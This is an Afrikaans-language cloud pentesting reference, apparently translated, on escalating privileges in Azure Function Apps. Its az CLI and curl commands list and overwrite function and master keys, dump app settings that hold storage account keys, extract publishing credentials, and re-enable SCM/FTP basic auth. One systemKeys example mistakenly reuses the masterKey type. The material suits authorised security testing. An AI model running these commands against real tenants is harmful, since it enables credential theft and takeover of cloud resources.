Az - Functions App Privesc

Funksie Apps

Kyk na die volgende bladsy vir meer inligting:

Microsoft.Web/sites/host/listkeys/action

Hierdie toestemming laat toe om die funksie, meester en stelselsleutels te lys, maar nie die gasheer een nie, van die gespesifiseerde funksie met:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

Hierdie toestemming laat toe om die gasheersleutel van die gespesifiseerde funksie te verkry met:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Hierdie toestemming laat toe om 'n funksiesleutel vir die gespesifiseerde funksie te skep/opdateer met:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Hierdie toestemming laat toe om 'n meester sleutel vir die gespesifiseerde funksie te skep/opdateer met:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Hierdie toestemming laat toe om 'n stelselfunksiesleutel te skep/opdateer vir die gespesifiseerde funksie met:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Hierdie toestemming laat toe om die omgewingsveranderlikes van 'n funksie te verkry. Binne hierdie veranderlikes mag dit moontlik wees om die standaard omgewing veranderlikes AzureWebJobsStorage of WEBSITE_CONTENTAZUREFILECONNECTIONSTRING te vind wat eintlik 'n rekening sleutel bevat om toegang te verkry tot die blob stoor van die funksie met VOLLE toestemmings.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Hierdie toestemmings laat toe om al die publikasieprofiele te lys wat basies basiese outentiseringsbewyse bevat:

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Metode SCM

Dan kan jy toegang verkry met hierdie basiese outentikasie akrediteerlinge na die SCM-URL van jou funksie-app en die waardes van die omgewing veranderlikes kry:

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Note dat die SCM gebruikersnaam gewoonlik die karakter "$" gevolg deur die naam van die app is, so: $<app-name>.

En hierdie omgewings veranderlikes bevat die AccountKey van die stoor rekening wat die data van die funksie app stoor, wat dit moontlik maak om daardie stoor rekening te beheer.

As jy sien dat daardie geloofsbriewe REDACTED is, is dit omdat jy die SCM basiese outentikasie opsie moet aktiveer en daarvoor het jy die tweede toestemming nodig (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'